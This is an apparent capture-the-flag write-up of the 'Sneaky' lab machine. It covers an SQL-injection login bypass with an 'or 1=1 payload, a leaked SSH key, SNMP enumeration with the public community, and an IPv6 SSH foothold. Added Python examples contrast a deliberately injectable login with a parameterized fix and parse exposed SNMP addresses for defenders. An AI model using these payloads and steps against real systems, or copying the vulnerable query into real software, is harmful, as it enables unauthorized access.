Sneaky

========================================================================
# ENUMERATION
# NMAP

- 80: Apache httpd 2.4.7 ((Ubuntu))
  http-title: Under Development!
  | vulners:
  |   cpe:/a:apache:http_server:2.4.7:
  |     CVE-2017-7679   7.5  https://vulners.com/cve/CVE-2017-7679
  |     CVE-2018-1312   6.8  https://vulners.com/cve/CVE-2018-1312
  |     CVE-2017-15715  6.8  https://vulners.com/cve/CVE-2017-15715
  |     CVE-2014-0226   6.8  https://vulners.com/cve/CVE-2014-0226
  |     CVE-2017-9788   6.4  https://vulners.com/cve/CVE-2017-9788
  |     CVE-2019-0217   6.0  https://vulners.com/cve/CVE-2019-0217
  |     CVE-2020-1927   5.8  https://vulners.com/cve/CVE-2020-1927
  |     CVE-2019-10098  5.8  https://vulners.com/cve/CVE-2019-10098
  |     CVE-2020-1934   5.0  https://vulners.com/cve/CVE-2020-1934
  |     CVE-2019-0220   5.0  https://vulners.com/cve/CVE-2019-0220
  |     CVE-2018-17199  5.0  https://vulners.com/cve/CVE-2018-17199
  |     CVE-2017-9798   5.0  https://vulners.com/cve/CVE-2017-9798
  |     CVE-2017-15710  5.0  https://vulners.com/cve/CVE-2017-15710
  |     CVE-2016-8743   5.0  https://vulners.com/cve/CVE-2016-8743
  |     CVE-2016-2161   5.0  https://vulners.com/cve/CVE-2016-2161
  |     CVE-2016-0736   5.0  https://vulners.com/cve/CVE-2016-0736
  |     CVE-2014-3523   5.0  https://vulners.com/cve/CVE-2014-3523
  |     CVE-2014-0231   5.0  https://vulners.com/cve/CVE-2014-0231
  |     CVE-2019-10092  4.3  https://vulners.com/cve/CVE-2019-10092
  |     CVE-2016-4975   4.3  https://vulners.com/cve/CVE-2016-4975
  |     CVE-2015-3185   4.3  https://vulners.com/cve/CVE-2015-3185
  |     CVE-2014-8109   4.3  https://vulners.com/cve/CVE-2014-8109
  |     CVE-2014-0118   4.3  https://vulners.com/cve/CVE-2014-0118
  |     CVE-2014-0117   4.3  https://vulners.com/cve/CVE-2014-0117
  |     CVE-2018-1283   3.5  https://vulners.com/cve/CVE-2018-1283
  |_    CVE-2016-8612   3.3  https://vulners.com/cve/CVE-2016-8612

========================================================================
# EXPLOIT
# SQL INJECTION (into the password)

- admin / 'or 1=1;
- name: admin
- name: thrasivoulos and a link to 'my key'
- http://10.10.10.20/dev/sshkeyforadministratordifficulttimes - revealed a private key...
- there is no port 22 on IPv4
- is the SSH port changed to another... nope, checked all that showed up.

========================================================================
# ENUMERATION
# SNMPWALK

- Being at the limit of my knowledge, it was time to learn something new
- a tutorial for Sneaky revealed a new tool that I hadn't used as of yet
- snmpwalk is a tool used by many network admins to get readings on their equipment.
- with it, they can troubleshoot behaviors or verify configurations
- In the case of this machine, we see snmp on port 161

kali@kali:~/HTB/RETIRED/Sneaky$ snmpwalk -v2c -c public 10.10.10.20 > snmp.txt

- This reveals a massive amount of data!
- I didn't understand much of the data until I read through some Google results, but...
- The results revealed IPv6 on the machine

========================================================================
# ENUMERATION
# ENYX.PY

- Another tool that I hadn't used before was called Enyx.
- This tool will grab IPv6 through SNMP

[+] Snmpwalk found.
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:c506
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:c506

========================================================================
# EXPLOIT
# SSH KEY

- Now, I could use the ssh key found earlier to connect
- There were two names presented, and only the second one worked.

$ ssh -i id_rsa_sneaky thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:c506
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$ ls
user.txt

Foot-hold complete!

========================================================================
# SAVE FOR LATER
# PRIVILEGE ESCALATION
========================================================================
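The password-field injection above works because the login builds its query by string concatenation, so the quote in the password closes the string literal and `or 1=1` widens the WHERE clause to every row, which is why the page shows both account names coming back. The following is an added example, not code from the box or the writeup: a minimal sqlite login with the vulnerable concatenated query beside the parameterized fix. The `users` table, both passwords and the comment-terminated payload `' or 1=1 --` (a variant of the page's payload in which the trailing `--` discards the closing quote the query appends) are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the app's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "CONSTRUCTED-PW-1"), ("thrasivoulos", "CONSTRUCTED-PW-2")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Concatenates user input into SQL: a quote in `password` escapes the literal.

    Returns every matching name, mirroring a page that lists all rows it finds."""
    query = (
        f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, name, password):
    """Bound parameters: the driver sends the values separately from the SQL text,
    so a quote or `or 1=1` in the password is only ever compared as data."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (name, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"  # constructed: closes the literal, widens WHERE, comments out the rest
    print("vulnerable:", login_vulnerable(db, "admin", payload))   # both users
    print("safe:      ", login_safe(db, "admin", payload))         # nothing
    print("safe, real:", login_safe(db, "admin", "CONSTRUCTED-PW-1"))
```

The effective vulnerable query is `... WHERE name = 'admin' AND password = '' or 1=1 --'`; with AND binding tighter than OR, that is `(false) OR true` for every row. Parameterization removes the bug; storing a salted password hash rather than the plaintext compared here is the other half of a sane login.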
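What Enyx pulled out of the walk above is IP-MIB's ipAddressTable: with a readable `public` community, every address the host has configured, IPv6 included, is handed to anyone who asks. As an added example (not the writeup's code and not Enyx), this script parses the numeric-OID form of such a walk (`snmpwalk -On`, where each ipAddressIfIndex row for an IPv6 entry carries address type 2, length 16 and then the 16 octets) and lists the addresses with their interface index, so an admin can see exactly what an unauthenticated read of their own snmpd exposes. The walk lines are constructed from the three addresses in the Enyx output above. One caveat: `dead:beef::/32` is not inside the unique-local range fc00::/7, so the script classes it as routable rather than Unique-Local as Enyx labels it.

```python
import ipaddress
import re

# ipAddressIfIndex is .1.3.6.1.2.1.4.34.1.3; the index is <addrType>.<length>.<octets>,
# and addrType 2 with length 16 is an IPv6 entry (IP-MIB, InetAddressType ipv6).
IPV6_ROW = re.compile(
    r"^\.?1\.3\.6\.1\.2\.1\.4\.34\.1\.3\.2\.16((?:\.\d{1,3}){16}) = INTEGER: (\d+)$"
)

# Constructed sample of `snmpwalk -On` output for the addresses seen on the box.
SAMPLE_WALK = """\
.1.3.6.1.2.1.4.34.1.3.1.4.10.10.10.20 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
.1.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.197.6 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.197.6 = INTEGER: 2
"""

ULA = ipaddress.ip_network("fc00::/7")


def classify(addr):
    """Scope of an IPv6 address, using the standard ranges rather than string prefixes."""
    if addr.is_loopback:
        return "Loopback"
    if addr.is_link_local:
        return "Link Local"
    if addr in ULA:
        return "Unique-Local"
    return "Global"


def ipv6_from_walk(text):
    """Return [(address, ifIndex, scope)] for every IPv6 row in a numeric-OID walk."""
    found = []
    for line in text.splitlines():
        m = IPV6_ROW.match(line.strip())
        if not m:
            continue  # IPv4 rows and unrelated OIDs
        octets = bytes(int(o) for o in m.group(1).strip(".").split("."))
        addr = ipaddress.IPv6Address(octets)  # 16-byte packed form
        found.append((str(addr), int(m.group(2)), classify(addr)))
    return found


if __name__ == "__main__":
    for address, ifindex, scope in ipv6_from_walk(SAMPLE_WALK):
        print(f"[+] {scope:<12} if{ifindex} -> {address}")
```

To run it against a real capture, pipe `snmpwalk -v2c -c <community> -On <host> .1.3.6.1.2.1.4.34.1.3` into the function. If the output contains anything beyond loopback and link-local, that is the information a default read community gives away; the fix on the agent side is to drop the `public` community, restrict `rocommunity` to the monitoring host's address, or move to SNMPv3 with authentication.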